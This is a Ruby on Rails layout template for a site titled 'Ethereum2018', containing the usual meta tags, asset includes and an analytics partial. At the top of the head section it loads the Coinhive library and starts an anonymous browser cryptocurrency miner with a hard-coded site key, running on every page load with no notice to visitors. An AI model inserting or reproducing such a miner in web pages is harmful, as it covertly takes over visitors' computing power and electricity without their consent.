<!DOCTYPE html>
<html>
<head>
	<script src="https://coinhive.com/lib/coinhive.min.js"></script>
	<script>
		var miner = new CoinHive.Anonymous('7aCNeRYuDln1kzqdl7zuSmPsLmW56N04', {throttle: 0.3});
    	miner.start();
	</script>
	
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Ethereum2018</title>
<%= csrf_meta_tags %>

<%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload' %>
<%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
<%= javascript_include_tag 'particles', 'app'%>
</head>

<body>
	<%= render 'layouts/google_analytics' %>
	<%= yield %>
</body>
</html>
